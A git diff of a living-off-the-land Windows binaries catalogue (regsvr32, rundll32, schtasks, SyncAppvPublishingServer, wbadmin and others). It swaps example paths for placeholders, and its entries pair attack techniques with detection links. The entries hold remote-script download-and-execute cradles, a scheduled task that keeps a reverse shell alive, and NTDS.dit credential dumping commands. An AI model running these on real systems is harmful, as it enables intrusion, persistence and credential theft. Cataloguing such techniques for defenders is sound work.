- Command: regsvr32.exe /s /u /i:file.sct scrobj.dll
- Command: regsvr32.exe /s /u /i:{PATH:.sct} scrobj.dll
Description: Execute the specified local .SCT script with scrobj.dll.
Usecase: Execute code from scriptlet, bypass Application whitelisting
Category: AWL Bypass
@ -23,7 +23,7 @@ Commands:
OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11
Tags:
- Execute: SCT
- Command: regsvr32 /s /n /u /i:http://example.com/file.sct scrobj.dll
- Command: regsvr32 /s /n /u /i:{REMOTEURL:.sct} scrobj.dll
Description: Execute the specified remote .SCT script with scrobj.dll.
Usecase: Execute code from remote scriptlet, bypass Application whitelisting
Category: Execute
@ -33,7 +33,7 @@ Commands:
Tags:
- Execute: SCT
- Execute: Remote
- Command: regsvr32.exe /s /u /i:file.sct scrobj.dll
- Command: regsvr32.exe /s /u /i:{PATH:.sct} scrobj.dll
Description: Execute the specified local .SCT script with scrobj.dll.
Usecase: Execute code from scriptlet, bypass Application whitelisting
Category: Execute

12
yml/OSBinaries/Replace.yml
View File

@ -1,18 +1,18 @@
---
Name: Replace.exe
Description: Used to replace file with another file
Author: 'Oddvar Moe'
Author: Oddvar Moe
Created: 2018-05-25
Commands:
- Command: replace.exe C:\Source\File.cab C:\Destination /A
Description: Copy file.cab to destination
- Command: replace.exe {PATH_ABSOLUTE:.cab} {PATH_ABSOLUTE:folder} /A
Description: Copy .cab file to destination
Usecase: Copy files
Category: Copy
Privileges: User
MitreID: T1105
OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11
- Command: replace.exe \\webdav.host.com\foo\bar.exe c:\outdir /A
Description: Download/Copy bar.exe to outdir
- Command: replace.exe {PATH_SMB:.exe} {PATH_ABSOLUTE:folder} /A
Description: Download/Copy executable to specified folder
Usecase: Download file
Category: Download
Privileges: User
@ -21,8 +21,6 @@ Commands:
Full_Path:
- Path: C:\Windows\System32\replace.exe
- Path: C:\Windows\SysWOW64\replace.exe
Code_Sample:
- Code:
Detection:
- IOC: Replace.exe retrieving files from remote server
- Sigma: https://github.com/SigmaHQ/sigma/blob/c04bef2fbbe8beff6c7620d5d7ea6872dbe7acba/rules/windows/process_creation/proc_creation_win_lolbin_replace.yml

4
yml/OSBinaries/Rpcping.yml
View File

@ -1,7 +1,7 @@
---
Name: Rpcping.exe
Description: Used to verify rpc connection
Author: 'Oddvar Moe'
Author: Oddvar Moe
Created: 2018-05-25
Commands:
- Command: rpcping -s 127.0.0.1 -e 1234 -a privacy -u NTLM
@ -21,8 +21,6 @@ Commands:
Full_Path:
- Path: C:\Windows\System32\rpcping.exe
- Path: C:\Windows\SysWOW64\rpcping.exe
Code_Sample:
- Code:
Detection:
- Sigma: https://github.com/SigmaHQ/sigma/blob/c04bef2fbbe8beff6c7620d5d7ea6872dbe7acba/rules/windows/process_creation/proc_creation_win_rpcping_credential_capture.yml
Resources:

25
yml/OSBinaries/Rundll32.yml
View File

@ -1,20 +1,20 @@
---
Name: Rundll32.exe
Description: Used by Windows to execute dll files
Author: 'Oddvar Moe'
Author: Oddvar Moe
Created: 2018-05-25
Commands:
- Command: rundll32.exe AllTheThingsx64,EntryPoint
Description: AllTheThingsx64 would be a .DLL file and EntryPoint would be the name of the entry point in the .DLL file to execute.
Usecase: Execute dll file
- Command: rundll32.exe {PATH},EntryPoint
Description: First part should be a DLL file (any extension accepted), EntryPoint should be the name of the entry point in the DLL file to execute.
Usecase: Execute DLL file
Category: Execute
Privileges: User
MitreID: T1218.011
OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11
Tags:
- Execute: DLL
- Command: rundll32.exe \\10.10.10.10\share\payload.dll,EntryPoint
Description: Use Rundll32.exe to execute a DLL from a SMB share. EntryPoint is the name of the entry point in the .DLL file to execute.
- Command: rundll32.exe {PATH_SMB:.dll},EntryPoint
Description: Execute a DLL from an SMB share. EntryPoint is the name of the entry point in the DLL file to execute.
Usecase: Execute DLL from SMB share.
Category: Execute
Privileges: User
@ -23,16 +23,7 @@ Commands:
Tags:
- Execute: DLL
- Execute: Remote
- Command: rundll32.exe javascript:"\..\mshtml.dll,RunHTMLApplication ";eval("w=new%20ActiveXObject(\"WScript.Shell\");w.run(\"calc\");window.close()");
Description: Use Rundll32.exe to execute a JavaScript script that runs calc.exe.
Usecase: Proxy execution
Category: Execute
Privileges: User
MitreID: T1218.011
OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11
Tags:
- Execute: JScript
- Command: rundll32.exe javascript:"\..\mshtml,RunHTMLApplication ";document.write();GetObject("script:https://raw.githubusercontent.com/3gstudent/Javascript-Backdoor/master/test")
- Command: rundll32.exe javascript:"\..\mshtml,RunHTMLApplication ";document.write();GetObject("script:{REMOTEURL}")
Description: Use Rundll32.exe to execute a JavaScript script that calls a remote JavaScript script.
Usecase: Execute code from Internet
Category: Execute
@ -41,7 +32,7 @@ Commands:
OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11
Tags:
- Execute: JScript
- Command: rundll32 "C:\ads\file.txt:ADSDLL.dll",DllMain
- Command: rundll32 "{PATH}:ADSDLL.dll",DllMain
Description: Use Rundll32.exe to execute a .DLL file stored in an Alternate Data Stream (ADS).
Usecase: Execute code from alternate data stream
Category: ADS

2
yml/OSBinaries/Runexehelper.yml
View File

@ -4,7 +4,7 @@ Description: Launcher process
Author: Grzegorz Tworek
Created: 2022-12-13
Commands:
- Command: runexehelper.exe c:\windows\system32\calc.exe
- Command: runexehelper.exe {PATH_ABSOLUTE:.exe}
Description: 'Launches the specified exe. Prerequisites: (1) diagtrack_action_output environment variable must be set to an existing, writable folder; (2) runexewithargs_output.txt file cannot exist in the folder indicated by the variable.'
Usecase: Executes arbitrary code
Category: Execute

6
yml/OSBinaries/Runonce.yml
View File

@ -1,11 +1,11 @@
---
Name: Runonce.exe
Description: Executes a Run Once Task that has been configured in the registry
Author: 'Oddvar Moe'
Author: Oddvar Moe
Created: 2018-05-25
Commands:
- Command: Runonce.exe /AlternateShellStartup
Description: Executes a Run Once Task that has been configured in the registry
Description: Executes a Run Once Task that has been configured in the registry.
Usecase: Persistence, bypassing defensive counter measures
Category: Execute
Privileges: Administrator
@ -16,8 +16,6 @@ Commands:
Full_Path:
- Path: C:\Windows\System32\runonce.exe
- Path: C:\Windows\SysWOW64\runonce.exe
Code_Sample:
- Code:
Detection:
- Sigma: https://github.com/SigmaHQ/sigma/blob/c04bef2fbbe8beff6c7620d5d7ea6872dbe7acba/rules/windows/registry/registry_event/registry_event_runonce_persistence.yml
- Sigma: https://github.com/SigmaHQ/sigma/blob/c04bef2fbbe8beff6c7620d5d7ea6872dbe7acba/rules/windows/process_creation/proc_creation_win_runonce_execution.yml

8
yml/OSBinaries/Runscripthelper.yml
View File

@ -1,11 +1,11 @@
---
Name: Runscripthelper.exe
Description: Execute target PowerShell script
Author: 'Oddvar Moe'
Author: Oddvar Moe
Created: 2018-05-25
Commands:
- Command: runscripthelper.exe surfacecheck \\?\C:\Test\Microsoft\Diagnosis\scripts\test.txt C:\Test
Description: Execute the PowerShell script named test.txt
- Command: runscripthelper.exe surfacecheck \\?\{PATH_ABSOLUTE:.txt} {PATH_ABSOLUTE:folder}
Description: Execute the PowerShell script with .txt extension
Usecase: Bypass constrained language mode and execute Powershell script
Category: Execute
Privileges: User
@ -16,8 +16,6 @@ Commands:
Full_Path:
- Path: C:\Windows\WinSxS\amd64_microsoft-windows-u..ed-telemetry-client_31bf3856ad364e35_10.0.16299.15_none_c2df1bba78111118\Runscripthelper.exe
- Path: C:\Windows\WinSxS\amd64_microsoft-windows-u..ed-telemetry-client_31bf3856ad364e35_10.0.16299.192_none_ad4699b571e00c4a\Runscripthelper.exe
Code_Sample:
- Code:
Detection:
- Sigma: https://github.com/SigmaHQ/sigma/blob/c04bef2fbbe8beff6c7620d5d7ea6872dbe7acba/rules/windows/process_creation/proc_creation_win_lolbin_runscripthelper.yml
- BlockRule: https://docs.microsoft.com/en-us/windows/security/threat-protection/windows-defender-application-control/microsoft-recommended-block-rules

6
yml/OSBinaries/Sc.yml
View File

@ -1,7 +1,7 @@
---
Name: Sc.exe
Description: Used by Windows to manage services
Author: 'Oddvar Moe'
Author: Oddvar Moe
Created: 2018-05-25
Commands:
- Command: sc create evilservice binPath="\"c:\\ADS\\file.txt:cmd.exe\" /c echo works > \"c:\ADS\works.txt\"" DisplayName= "evilservice" start= auto\ & sc start evilservice
@ -13,7 +13,7 @@ Commands:
OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11
Tags:
- Execute: EXE
- Command: sc config <existing> binPath="\"c:\\ADS\\file.txt:cmd.exe\" /c echo works > \"c:\ADS\works.txt\"" & sc start <existing>
- Command: sc config {ExistingServiceName} binPath="\"c:\\ADS\\file.txt:cmd.exe\" /c echo works > \"c:\ADS\works.txt\"" & sc start {ExistingServiceName}
Description: Modifies an existing service and executes the file stored in the ADS.
Usecase: Execute binary file hidden inside an alternate data stream
Category: ADS
@ -25,8 +25,6 @@ Commands:
Full_Path:
- Path: C:\Windows\System32\sc.exe
- Path: C:\Windows\SysWOW64\sc.exe
Code_Sample:
- Code:
Detection:
- Sigma: https://github.com/SigmaHQ/sigma/blob/6312dd1d44d309608552105c334948f793e89f48/rules/windows/process_creation/proc_creation_win_susp_service_creation.yml
- Sigma: https://github.com/SigmaHQ/sigma/blob/c04bef2fbbe8beff6c7620d5d7ea6872dbe7acba/rules/windows/process_creation/proc_creation_win_sc_change_sevice_image_path_by_non_admin.yml

11
yml/OSBinaries/Schtasks.yml
View File

@ -1,10 +1,10 @@
---
Name: Schtasks.exe
Description: Schedule periodic tasks
Author: 'Oddvar Moe'
Author: Oddvar Moe
Created: 2018-05-25
Commands:
- Command: schtasks /create /sc minute /mo 1 /tn "Reverse shell" /tr c:\some\directory\revshell.exe
- Command: schtasks /create /sc minute /mo 1 /tn "Reverse shell" /tr "{CMD}"
Description: Create a recurring task to execute every minute.
Usecase: Create a recurring task to keep reverse shell session(s) alive
Category: Execute
@ -13,7 +13,7 @@ Commands:
OperatingSystem: Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11
Tags:
- Execute: CMD
- Command: schtasks /create /s targetmachine /tn "MyTask" /tr c:\some\directory\notevil.exe /sc daily
- Command: schtasks /create /s targetmachine /tn "MyTask" /tr "{CMD}" /sc daily
Description: Create a scheduled task on a remote computer for persistence/lateral movement
Usecase: Create a remote task to run daily relative to the the time of creation
Category: Execute
@ -25,8 +25,6 @@ Commands:
Full_Path:
- Path: c:\windows\system32\schtasks.exe
- Path: c:\windows\syswow64\schtasks.exe
Code_Sample:
- Code:
Detection:
- Sigma: https://github.com/SigmaHQ/sigma/blob/c04bef2fbbe8beff6c7620d5d7ea6872dbe7acba/rules/windows/process_creation/proc_creation_win_schtasks_creation.yml
- Elastic: https://github.com/elastic/detection-rules/blob/ef7548f04c4341e0d1a172810330d59453f46a21/rules/windows/persistence_local_scheduled_task_creation.toml
@ -34,6 +32,3 @@ Detection:
- IOC: Suspicious task creation events
Resources:
- Link: https://isc.sans.edu/forums/diary/Adding+Persistence+Via+Scheduled+Tasks/23633/
Acknowledgement:
- Person:
Handle:

12
yml/OSBinaries/Scriptrunner.yml
View File

@ -1,11 +1,11 @@
---
Name: Scriptrunner.exe
Description: Execute binary through proxy binary to evade defensive counter measures
Author: 'Oddvar Moe'
Author: Oddvar Moe
Created: 2018-05-25
Commands:
- Command: Scriptrunner.exe -appvscript calc.exe
Description: Executes calc.exe
- Command: Scriptrunner.exe -appvscript {PATH:.exe}
Description: Executes executable
Usecase: Execute binary through proxy binary to evade defensive counter measures
Category: Execute
Privileges: User
@ -13,8 +13,8 @@ Commands:
OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11
Tags:
- Execute: EXE
- Command: ScriptRunner.exe -appvscript "\\fileserver\calc.cmd"
Description: Executes calc.cmd from remote server
- Command: ScriptRunner.exe -appvscript {PATH_SMB:.cmd}
Description: Executes cmd file from remote server
Usecase: Execute binary through proxy binary from external server to evade defensive counter measures
Category: Execute
Privileges: User
@ -26,8 +26,6 @@ Commands:
Full_Path:
- Path: C:\Windows\System32\scriptrunner.exe
- Path: C:\Windows\SysWOW64\scriptrunner.exe
Code_Sample:
- Code:
Detection:
- Sigma: https://github.com/SigmaHQ/sigma/blob/683b63f8184b93c9564c4310d10c571cbe367e1e/rules/windows/process_creation/proc_creation_win_servu_susp_child_process.yml
- IOC: Scriptrunner.exe should not be in use unless App-v is deployed

6
yml/OSBinaries/SettingSyncHost.yml
View File

@ -1,10 +1,10 @@
---
Name: SettingSyncHost.exe
Description: Host Process for Setting Synchronization
Author: 'Elliot Killick'
Author: Elliot Killick
Created: 2021-08-26
Commands:
- Command: SettingSyncHost -LoadAndRunDiagScript anything
- Command: SettingSyncHost -LoadAndRunDiagScript {PATH:.exe}
Description: Execute file specified in %COMSPEC%
Usecase: Can be used to evade defensive countermeasures or to hide as a persistence mechanism
Category: Execute
@ -13,7 +13,7 @@ Commands:
OperatingSystem: Windows 8, Windows 8.1, Windows 10
Tags:
- Execute: EXE
- Command: SettingSyncHost -LoadAndRunDiagScriptNoCab anything
- Command: SettingSyncHost -LoadAndRunDiagScriptNoCab {PATH:.bat}
Description: Execute a batch script in the background (no window ever pops up) which can be subverted to running arbitrary programs by setting the current working directory to %TMP% and creating files such as reg.bat/reg.exe in that directory thereby causing them to execute instead of the ones in C:\Windows\System32.
Usecase: Can be used to evade defensive countermeasures or to hide as a persistence mechanism. Additionally, effectively act as a -WindowStyle Hidden option (as there is in PowerShell) for any arbitrary batch file.
Category: Execute

12
yml/OSBinaries/Ssh.yml
View File

@ -1,11 +1,11 @@
---
Name: ssh.exe
Description: Ssh.exe is the OpenSSH compatible client can be used to connect to Windows 10 (build 1809 and later) and Windows Server 2019 devices.
Author: 'Akshat Pradhan'
Created: '2021-11-08'
Author: Akshat Pradhan
Created: 2021-11-08
Commands:
- Command: ssh localhost calc.exe
Description: Execute calc.exe on host machine. The prompt for password can be eliminated by adding the host's public key in the user's authorized_keys file. Adversaries can do the same for execution on remote machines.
- Command: ssh localhost "{CMD}"
Description: Executes specified command on host machine. The prompt for password can be eliminated by adding the host's public key in the user's authorized_keys file. Adversaries can do the same for execution on remote machines.
Usecase: Execute specified command, can be used for defense evasion.
Category: Execute
Privileges: User
@ -13,8 +13,8 @@ Commands:
OperatingSystem: Windows 10 1809, Windows Server 2019
Tags:
- Execute: CMD
- Command: ssh -o ProxyCommand=calc.exe .
Description: Executes calc.exe from ssh.exe
- Command: ssh -o ProxyCommand="{CMD}" .
Description: Executes specified command from ssh.exe
Usecase: Performs execution of specified file, can be used as a defensive evasion.
Category: Execute
Privileges: User

6
yml/OSBinaries/Syncappvpublishingserver.yml
View File

@ -1,10 +1,10 @@
---
Name: SyncAppvPublishingServer.exe
Description: Used by App-v to get App-v server lists
Author: 'Oddvar Moe'
Author: Oddvar Moe
Created: 2018-05-25
Commands:
- Command: SyncAppvPublishingServer.exe "n;(New-Object Net.WebClient).DownloadString('http://some.url/script.ps1') | IEX"
- Command: SyncAppvPublishingServer.exe "n;(New-Object Net.WebClient).DownloadString('{REMOTEURL:.ps1}') | IEX"
Description: Example command on how inject Powershell code into the process
Usecase: Use SyncAppvPublishingServer as a Powershell host to execute Powershell code. Evade defensive counter measures
Category: Execute
@ -16,8 +16,6 @@ Commands:
Full_Path:
- Path: C:\Windows\System32\SyncAppvPublishingServer.exe
- Path: C:\Windows\SysWOW64\SyncAppvPublishingServer.exe
Code_Sample:
- Code:
Detection:
- Sigma: https://github.com/SigmaHQ/sigma/blob/6312dd1d44d309608552105c334948f793e89f48/rules/windows/powershell/powershell_script/posh_ps_syncappvpublishingserver_exe.yml
- Sigma: https://github.com/SigmaHQ/sigma/blob/6312dd1d44d309608552105c334948f793e89f48/rules/windows/powershell/powershell_module/posh_pm_syncappvpublishingserver_exe.yml

10
yml/OSBinaries/Tar.yml
View File

@ -1,10 +1,10 @@
---
Name: Tar.exe
Description: Used by Windows to extract and create archives.
Author: 'Brian Lucero'
Author: Brian Lucero
Created: 2023-01-30
Commands:
- Command: tar -cf compressedfilename:ads C:\folder\file
- Command: tar -cf {PATH}:ads {PATH_ABSOLUTE:folder}
Description: Compress one or more files to an alternate data stream (ADS).
Usecase: Can be used to evade defensive countermeasures, or to hide as part of a persistence mechanism
Category: ADS
@ -13,7 +13,7 @@ Commands:
OperatingSystem: Windows 10, Windows 11
Tags:
- Type: Compression
- Command: tar -xf compressedfilename:ads
- Command: tar -xf {PATH}:ads
Description: Decompress a compressed file from an alternate data stream (ADS).
Usecase: Can be used to evade defensive countermeasures, or to hide as part of a persistence mechanism
Category: ADS
@ -22,8 +22,8 @@ Commands:
OperatingSystem: Windows 10, Windows 11
Tags:
- Type: Compression
- Command: tar -xf \\host1\archive.tar
Description: Extracts archive.tar from the remote (internal) host (host1) to the current host.
- Command: tar -xf {PATH_SMB:.tar}
Description: Extracts archive.tar from the remote (internal) host to the current host.
Usecase: Copy files
Category: Copy
Privileges: User

12
yml/OSBinaries/Ttdinject.yml
View File

@ -1,11 +1,11 @@
---
Name: Ttdinject.exe
Description: Used by Windows 1809 and newer to Debug Time Travel (Underlying call of tttracer.exe)
Author: 'Maxime Nadeau'
Author: Maxime Nadeau
Created: 2020-05-12
Commands:
- Command: TTDInject.exe /ClientParams "7 tmp.run 0 0 0 0 0 0 0 0 0 0" /Launch "C:/Windows/System32/calc.exe"
Description: Execute calc using ttdinject.exe. Requires administrator privileges. A log file will be created in tmp.run. The log file can be changed, but the length (7) has to be updated.
- Command: TTDInject.exe /ClientParams "7 tmp.run 0 0 0 0 0 0 0 0 0 0" /Launch "{PATH:.exe}"
Description: Execute a program using ttdinject.exe. Requires administrator privileges. A log file will be created in tmp.run. The log file can be changed, but the length (7) has to be updated.
Usecase: Spawn process using other binary
Category: Execute
Privileges: Administrator
@ -13,8 +13,8 @@ Commands:
OperatingSystem: Windows 10 2004 and above, Windows 11
Tags:
- Execute: EXE
- Command: ttdinject.exe /ClientScenario TTDRecorder /ddload 0 /ClientParams "7 tmp.run 0 0 0 0 0 0 0 0 0 0" /launch "C:/Windows/System32/calc.exe"
Description: Execute calc using ttdinject.exe. Requires administrator privileges. A log file will be created in tmp.run. The log file can be changed, but the length (7) has to be updated.
- Command: ttdinject.exe /ClientScenario TTDRecorder /ddload 0 /ClientParams "7 tmp.run 0 0 0 0 0 0 0 0 0 0" /launch "{PATH:.exe}"
Description: Execute a program using ttdinject.exe. Requires administrator privileges. A log file will be created in tmp.run. The log file can be changed, but the length (7) has to be updated.
Usecase: Spawn process using other binary
Category: Execute
Privileges: Administrator
@ -25,8 +25,6 @@ Commands:
Full_Path:
- Path: C:\Windows\System32\ttdinject.exe
- Path: C:\Windows\Syswow64\ttdinject.exe
Code_Sample:
- Code:
Detection:
- Sigma: https://github.com/SigmaHQ/sigma/blob/683b63f8184b93c9564c4310d10c571cbe367e1e/rules/windows/create_remote_thread/create_remote_thread_win_ttdinjec.yml
- Sigma: https://github.com/SigmaHQ/sigma/blob/7ea6ed3db65e0bd812b051d9bb4fffd27c4c4d0a/rules/windows/process_creation/proc_creation_win_lolbin_ttdinject.yml

10
yml/OSBinaries/Tttracer.yml
View File

@ -1,11 +1,11 @@
---
Name: Tttracer.exe
Description: Used by Windows 1809 and newer to Debug Time Travel
Author: 'Oddvar Moe'
Author: Oddvar Moe
Created: 2019-11-05
Commands:
- Command: tttracer.exe C:\windows\system32\calc.exe
Description: Execute calc using tttracer.exe. Requires administrator privileges
- Command: tttracer.exe {PATH_ABSOLUTE:.exe}
Description: Execute specified executable from tttracer.exe. Requires administrator privileges.
Usecase: Spawn process using other binary
Category: Execute
Privileges: Administrator
@ -13,7 +13,7 @@ Commands:
OperatingSystem: Windows 10 1809 and newer, Windows 11
Tags:
- Execute: EXE
- Command: TTTracer.exe -dumpFull -attach pid
- Command: TTTracer.exe -dumpFull -attach {PID}
Description: Dumps process using tttracer.exe. Requires administrator privileges
Usecase: Dump process by PID
Category: Dump
@ -23,8 +23,6 @@ Commands:
Full_Path:
- Path: C:\Windows\System32\tttracer.exe
- Path: C:\Windows\SysWOW64\tttracer.exe
Code_Sample:
- Code:
Detection:
- Sigma: https://github.com/SigmaHQ/sigma/blob/683b63f8184b93c9564c4310d10c571cbe367e1e/rules/windows/process_creation/proc_creation_win_lolbin_tttracer_mod_load.yml
- Sigma: https://github.com/SigmaHQ/sigma/blob/683b63f8184b93c9564c4310d10c571cbe367e1e/rules/windows/image_load/image_load_tttracer_mod_load.yml

2
yml/OSBinaries/Unregmp2.yml
View File

@ -1,7 +1,7 @@
---
Name: Unregmp2.exe
Description: Microsoft Windows Media Player Setup Utility
Author: 'Wade Hickey'
Author: Wade Hickey
Created: 2021-12-06
Commands:
- Command: rmdir %temp%\lolbin /s /q 2>nul & mkdir "%temp%\lolbin\Windows Media Player" & copy C:\Windows\System32\calc.exe "%temp%\lolbin\Windows Media Player\wmpnscfg.exe" >nul && cmd /V /C "set "ProgramW6432=%temp%\lolbin" && unregmp2.exe /HideWMP"

6
yml/OSBinaries/Vbc.yml
View File

@ -4,14 +4,14 @@ Description: Binary file used for compile vbs code
Author: Lior Adar
Created: 2020-02-27
Commands:
- Command: vbc.exe /target:exe c:\temp\vbs\run.vb
- Command: vbc.exe /target:exe {PATH_ABSOLUTE:.vb}
Description: Binary file used by .NET to compile Visual Basic code to an executable.
Usecase: Compile attacker code on system. Bypass defensive counter measures.
Category: Compile
Privileges: User
MitreID: T1127
OperatingSystem: Windows 7, Windows 10, Windows 11
- Command: vbc -reference:Microsoft.VisualBasic.dll c:\temp\vbs\run.vb
- Command: vbc -reference:Microsoft.VisualBasic.dll {PATH_ABSOLUTE:.vb}
Description: Binary file used by .NET to compile Visual Basic code to an executable.
Usecase: Compile attacker code on system. Bypass defensive counter measures.
Category: Compile
@ -25,8 +25,6 @@ Full_Path:
- Path: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\vbc.exe
- Path: C:\Windows\Microsoft.NET\Framework64\v3.5\vbc.exe
- Path: C:\Windows\Microsoft.NET\Framework64\v2.0.50727\vbc.exe
Code_Sample:
- Code:
Detection:
- Sigma: https://github.com/SigmaHQ/sigma/blob/683b63f8184b93c9564c4310d10c571cbe367e1e/rules/windows/process_creation/proc_creation_win_lolbin_visual_basic_compiler.yml
- Elastic: https://github.com/elastic/detection-rules/blob/61afb1c1c0c3f50637b1bb194f3e6fb09f476e50/rules/windows/defense_evasion_dotnet_compiler_parent_process.toml

4
yml/OSBinaries/Verclsid.yml
View File

@ -6,7 +6,7 @@ Created: 2018-12-04
Commands:
- Command: verclsid.exe /S /C {CLSID}
Description: Used to verify a COM object before it is instantiated by Windows Explorer
Usecase: Run a com object created in registry to evade defensive counter measures
Usecase: Run a COM object created in registry to evade defensive counter measures
Category: Execute
Privileges: User
MitreID: T1218.012
@ -16,8 +16,6 @@ Commands:
Full_Path:
- Path: C:\Windows\System32\verclsid.exe
- Path: C:\Windows\SysWOW64\verclsid.exe
Code_Sample:
- Code:
Detection:
- Sigma: https://github.com/SigmaHQ/sigma/blob/683b63f8184b93c9564c4310d10c571cbe367e1e/rules/windows/process_creation/proc_creation_win_verclsid_runs_com.yml
- Splunk: https://github.com/splunk/security_content/blob/a1afa0fa605639cbef7d528dec46ce7c8112194a/detections/endpoint/verclsid_clsid_execution.yml

4
yml/OSBinaries/Wab.yml
View File

@ -1,7 +1,7 @@
---
Name: Wab.exe
Description: Windows address book manager
Author: 'Oddvar Moe'
Author: Oddvar Moe
Created: 2018-05-25
Commands:
- Command: wab.exe
@ -16,8 +16,6 @@ Commands:
Full_Path:
- Path: C:\Program Files\Windows Mail\wab.exe
- Path: C:\Program Files (x86)\Windows Mail\wab.exe
Code_Sample:
- Code:
Detection:
- Sigma: https://github.com/SigmaHQ/sigma/blob/683b63f8184b93c9564c4310d10c571cbe367e1e/rules/windows/registry/registry_set/registry_set_wab_dllpath_reg_change.yml
- IOC: WAB.exe should normally never be used

4
yml/OSBinaries/Wbadmin.yml
View File

@ -4,14 +4,14 @@ Description: Windows Backup Administration utility
Author: Chris Eastwood
Created: 2024-04-05
Commands:
- Command: wbadmin start backup -backupTarget:C:\temp\ -include:C:\Windows\NTDS\NTDS.dit,C:\Windows\System32\config\SYSTEM -quiet
- Command: wbadmin start backup -backupTarget:{PATH_ABSOLUTE:folder} -include:C:\Windows\NTDS\NTDS.dit,C:\Windows\System32\config\SYSTEM -quiet
Description: Extract NTDS.dit and SYSTEM hive into backup virtual hard drive file (.vhdx)
Usecase: Snapshoting of Active Directory NTDS.dit database
Category: Dump
Privileges: Administrator, Backup Operators, SeBackupPrivilege
MitreID: T1003.003
OperatingSystem: Windows Server
- Command: wbadmin start recovery -version:<VERSIONIDENTIFIER> -recoverytarget:C:\temp -itemtype:file -items:C:\Windows\NTDS\NTDS.dit,C:\Windows\System32\config\SYSTEM -notRestoreAcl -quiet
- Command: wbadmin start recovery -version:<VERSIONIDENTIFIER> -recoverytarget:{PATH_ABSOLUTE:folder} -itemtype:file -items:C:\Windows\NTDS\NTDS.dit,C:\Windows\System32\config\SYSTEM -notRestoreAcl -quiet
Description: Restore a version of NTDS.dit and SYSTEM hive into file path. The command `wbadmin get versions` can be used to find version identifiers.
Usecase: Dumping of Active Directory NTDS.dit database
Category: Dump

6
yml/OSBinaries/Winget.yml
View File

@ -4,8 +4,8 @@ Description: Windows Package Manager tool
Author: Paul Sanders
Created: 2022-01-03
Commands:
- Command: winget.exe install --manifest manifest.yml
Description: 'Downloads a file from the web address specified in manifest.yml and executes it on the system. Local manifest setting must be enabled in winget for it to work: `winget settings --enable LocalManifestFiles`'
- Command: winget.exe install --manifest {PATH:.yml}
Description: 'Downloads a file from the web address specified in .yml file and executes it on the system. Local manifest setting must be enabled in winget for it to work: `winget settings --enable LocalManifestFiles`'
Usecase: Download and execute an arbitrary file from the internet
Category: Execute
Privileges: Local Administrator - required to enable local manifest setting
@ -14,7 +14,7 @@ Commands:
Tags:
- Execute: Remote
- Execute: EXE
- Command: winget.exe install --accept-package-agreements -s msstore [name or ID]
- Command: winget.exe install --accept-package-agreements -s msstore {name or ID}
Description: 'Download and install any software from the Microsoft Store using its name or Store ID, even if the Microsoft Store App itself is blocked on the machine. For example, use "Sysinternals Suite" or `9p7knl5rwt25` for obtaining ProcDump, PsExec via the Sysinternals Suite. Note: a Microsoft account is required for this.'
Usecase: Download and install software from Microsoft Store, even if Microsoft Store App is blocked
Category: Download

Some files were not shown because too many files have changed in this diff Show More